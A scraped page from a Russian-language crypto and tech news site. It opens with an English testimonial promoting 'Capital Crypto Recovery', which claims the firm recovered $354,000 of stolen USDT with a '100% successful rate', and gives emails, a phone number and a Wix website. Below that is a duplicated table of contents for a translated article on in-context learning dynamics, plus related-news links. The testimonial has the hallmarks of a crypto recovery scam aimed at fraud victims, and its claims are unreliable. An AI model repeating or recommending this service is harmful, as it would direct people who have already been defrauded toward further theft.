Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

Для участия в Чате вам необходим бесплатный аккаунт pro-blockchain.com Войти Регистрация

Н Новости

[Перевод] Без тренировки, но с обучением: имплицитная динамика in-context learning

Аннотация

1. Введение

Основные элементы работы:

1.1 Смежные работы

2. Контекстные блоки

Динамика неявного обучения в ICL

4. Эксперименты

4.1 Постановка эксперимента (Setup)

4.2 Проверка теоремы 2.2

4.3 Сходимость ΔW

4.4 Сравнение с fine-tuning

5. Заключение и ограничения

A. Контекстные блоки со skip-соединениями

B. Альтернативная неявная динамика обучения ICL

Похожие новости

Итоги недели: новая коррекция биткоина и рекордные объемы крипторынка РФ

Разработка приложения в Replit: сколько стоит и кому подходит

Как роботы начинают учиться гораздо быстрее

Новые правила для GPAI и «каскад обязанностей»: как небольшой команде превратить риски EU AI Act в преимущество

[Перевод] Как шаблоны рассуждения учат ИИ думать: новая эпоха Pattern-Aware Learning (PARO)

Завайбкодил за 4 часа AI дневник питания и перестал пользоваться OURA

Н Новости

[Перевод] Без тренировки, но с обучением: имплицитная динамика in-context learning

Аннотация

1. Введение

Основные элементы работы:

1.1 Смежные работы

2. Контекстные блоки

Динамика неявного обучения в ICL

4. Эксперименты

4.1 Постановка эксперимента (Setup)

4.2 Проверка теоремы 2.2

4.3 Сходимость ΔW

4.4 Сравнение с fine-tuning

5. Заключение и ограничения

A. Контекстные блоки со skip-соединениями

B. Альтернативная неявная динамика обучения ICL

Похожие новости

Итоги недели: новая коррекция биткоина и рекордные объемы крипторынка РФ

Разработка приложения в Replit: сколько стоит и кому подходит

Как роботы начинают учиться гораздо быстрее

Новые правила для GPAI и «каскад обязанностей»: как небольшой команде превратить риски EU AI Act в преимущество

[Перевод] Как шаблоны рассуждения учат ИИ думать: новая эпоха Pattern-Aware Learning (PARO)

Завайбкодил за 4 часа AI дневник питания и перестал пользоваться OURA

Оставайтесь на связи